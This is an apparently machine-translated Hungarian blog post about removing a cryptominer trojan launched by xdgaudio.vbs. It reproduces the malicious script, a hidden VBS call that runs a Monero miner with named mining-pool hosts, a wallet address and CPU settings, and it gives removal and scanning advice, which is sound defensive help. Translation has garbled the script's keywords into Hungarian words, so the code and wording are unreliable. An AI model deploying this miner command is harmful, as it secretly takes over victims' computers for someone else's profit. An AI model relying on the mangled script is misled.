Ha az alábbi, „xdgaudio.vbs” fájlhoz kapcsolódó hibaüzenetet kapja a rendszerében, akkor nagy valószínűséggel számítógépe fertőzött.
Szkript: C:\windows\xdgaudio.vbs
sor: 3
Karakter: 1
Hiba: A rendszer nem találja a megadott fájlt.
Kód: 80070002
Forrás: (null)
A Jegyzettömbbel szerkesztve a szkript az alábbihoz hasonló sorokat tartalmazhat:
Halvány WShell. Set WShell = CreateObject("WScript. Héj") WShell. Futtassa a következőt: "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv. App -p x -k -o stratum+tcp://mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7gRv -p x", 0. Állítsa be a WShell = SemmitEz minden bizonnyal úgy néz ki, mint egy CPU / kriptovaluta Miner trójai, amely nemcsak lelassítja a számítógépet, hanem biztonsági fenyegetést is jelenthet. A script fájlok
c:\windows\xdgaudio.vbs és c:\windows\servicecrsssr.vbs törölni kell. Ez nem elég. Futtasson le egy alapos vizsgálatot a Malwarebytes antimalware segítségével, és végezzen vizsgálatot a használt víruskereső szoftverrel is.Az ilyen Miner Trojan eltávolítására vonatkozó részletes utasításokért tekintse meg a malwaretips.com útmutatót A CPU Miner Trojan eltávolítása a Windows rendszerből (Vírus súgóútmutató).
Egy apró kérés: Ha tetszett a bejegyzés, kérlek oszd meg?
Egy "apró" megosztásod komolyan segítene ennek a blognak a növekedésében. Néhány nagyszerű javaslat:- Tűzd ki!
- Oszd meg kedvenc blogoddal + Facebook, Reddit
- Tweeteljen!